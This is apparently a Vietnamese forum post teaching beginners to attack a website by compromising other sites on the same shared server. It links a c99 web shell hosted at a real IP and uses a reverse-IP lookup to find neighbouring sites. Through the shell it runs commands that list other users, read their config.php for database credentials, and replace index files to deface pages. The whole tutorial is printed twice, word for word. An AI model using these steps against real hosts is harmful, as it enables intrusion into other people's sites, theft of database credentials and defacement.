cách local 1 site
Posted in Phần Mềm
Hôm nay, vào 1 topic, thấy 1 số bạn vẫn chưa bik local , nên mình mạn phép viết 1 topic, dù mình rất gà, nhưng cũng xin viết tut cho những bạn như mình
ok :
sắn có shell, làm luôn
Code:
http://74.54.136.66/~yeubz/abc/c99.php
mình quen sài shell c99
bây giờ,giả sử như ta chưa có shell đúng hem
muốn attack 1 site có nhiều cách, nhưng những cách sau newbie tụi mình hay làm
1) tìm bug ngay trên victim
2) nếu victim ko có bug, ta tìm site cùng server local chơi
mình đang muốn nói cách 2 trong topic này
giả sử victim của ta ko có bug, làm jì đây
mình whois xem hàng xóm của nó thử coi
Code:
http://crushmachine.com/rip.php?host=74.54.136.66&page=6
chắc chắn các bạn sẽ thấy nhiếu site, ta tìm bug trên từng site,sau đó tìm cách up 1 con r57 or c99 để local
giả sử mình tìm dc 1 thằng này đó có bug, up dc shell. Trong tay có shell, làm jì nhỉ
chơi thoai
Code:
http://74.54.136.66/~yeubz/abc/c99.php
ok, mình bắt đầu với lệnh
Code:
cd /etc/valiases && ls -lia
lệnh này tìm user cùng site của user đó
khi nó hiện ra, ta tìm victim cần local
giả sử ta dùng luôn thằng yeubz ha, mà site này cũng có sex, tui ghét sex lắm . OK , ta dùng lệnh sau
Code:
dir /home/yeubz/public_html/
bạn bik jì về lệnh này, nếu ko bik xin vui lòng đọc tài liệu ok
sau khi ta vào dc thư mục, thì ta thấy các thư mục, các file, tệp, dùng ệnh này để đọc, vidụ như :
Code:
cat //home/yeubz/public_html/abc/config.php
ở đây nếu file ko bị chmod kĩ, thì ta có thể view dc ìno trong đó vd:
Code:
$db_config=array("host"=>"localhost","port"=>"",
"user"=>"demo",
"pass"=>"123456","database"=>"qanh_quanganh");
$common_config=array();
$common_config['product_per_page']="12";
$common_config['member_per_page']="10";
$common_config['guestbook_per_page']="5";
$common_config['support_email']="support@quanganh.com.vn";
$common_config['contact_email']="info@quanganh.com.vn";
$common_config['sales_email']="sales@quanganh.com.vn";
$common_config['axiom_per_member']="10";
$common_config['stories_per_page']="5";
$common_config['page_per_page']="10";
$common_config['diary_per_page']="5";
$common_config['num_free_picture']="10";
$common_config['allow_free_planner']="1";
?>
d0ây là file mình up lên để demo , khi các bạn có info của data, thì mình connect tới SQL, điền đầy đủ thông tin
con các bạn muốn deface, thì mình phải có quyền
Code:
uid=32119(yeubz) gid=32122(yeubz) groups=32122(yeubz)
như thế này, các bạn có thể xóa fiel index để thay = file của mình, mình up dc file ảnh
Code:
http://74.54.136.66/~yeubz/abc/deface.JPG
vậy thui, còn nhiều nữa, mình chỉ dẫn những cái cơ bản thui, khi nào đó rảnh mình làm cái video local basic cho các bạn nha , giờ đang bận thi hk
the end , đừng chê nha các anh
ok :
sắn có shell, làm luôn
Code:
http://74.54.136.66/~yeubz/abc/c99.php
mình quen sài shell c99
bây giờ,giả sử như ta chưa có shell đúng hem
muốn attack 1 site có nhiều cách, nhưng những cách sau newbie tụi mình hay làm
1) tìm bug ngay trên victim
2) nếu victim ko có bug, ta tìm site cùng server local chơi
mình đang muốn nói cách 2 trong topic này
giả sử victim của ta ko có bug, làm jì đây
mình whois xem hàng xóm của nó thử coi
Code:
http://crushmachine.com/rip.php?host=74.54.136.66&page=6
chắc chắn các bạn sẽ thấy nhiếu site, ta tìm bug trên từng site,sau đó tìm cách up 1 con r57 or c99 để local
giả sử mình tìm dc 1 thằng này đó có bug, up dc shell. Trong tay có shell, làm jì nhỉ
chơi thoai
Code:
http://74.54.136.66/~yeubz/abc/c99.php
ok, mình bắt đầu với lệnh
Code:
cd /etc/valiases && ls -lia
lệnh này tìm user cùng site của user đó
khi nó hiện ra, ta tìm victim cần local
giả sử ta dùng luôn thằng yeubz ha, mà site này cũng có sex, tui ghét sex lắm . OK , ta dùng lệnh sau
Code:
dir /home/yeubz/public_html/
bạn bik jì về lệnh này, nếu ko bik xin vui lòng đọc tài liệu ok
sau khi ta vào dc thư mục, thì ta thấy các thư mục, các file, tệp, dùng ệnh này để đọc, vidụ như :
Code:
cat //home/yeubz/public_html/abc/config.php
ở đây nếu file ko bị chmod kĩ, thì ta có thể view dc ìno trong đó vd:
Code:
$db_config=array("host"=>"localhost","port"=>"",
"user"=>"demo",
"pass"=>"123456","database"=>"qanh_quanganh");
$common_config=array();
$common_config['product_per_page']="12";
$common_config['member_per_page']="10";
$common_config['guestbook_per_page']="5";
$common_config['support_email']="support@quanganh.com.vn";
$common_config['contact_email']="info@quanganh.com.vn";
$common_config['sales_email']="sales@quanganh.com.vn";
$common_config['axiom_per_member']="10";
$common_config['stories_per_page']="5";
$common_config['page_per_page']="10";
$common_config['diary_per_page']="5";
$common_config['num_free_picture']="10";
$common_config['allow_free_planner']="1";
?>
d0ây là file mình up lên để demo , khi các bạn có info của data, thì mình connect tới SQL, điền đầy đủ thông tin
con các bạn muốn deface, thì mình phải có quyền
Code:
uid=32119(yeubz) gid=32122(yeubz) groups=32122(yeubz)
như thế này, các bạn có thể xóa fiel index để thay = file của mình, mình up dc file ảnh
Code:
http://74.54.136.66/~yeubz/abc/deface.JPG
vậy thui, còn nhiều nữa, mình chỉ dẫn những cái cơ bản thui, khi nào đó rảnh mình làm cái video local basic cho các bạn nha , giờ đang bận thi hk
the end , đừng chê nha các anh
0 nhận xét: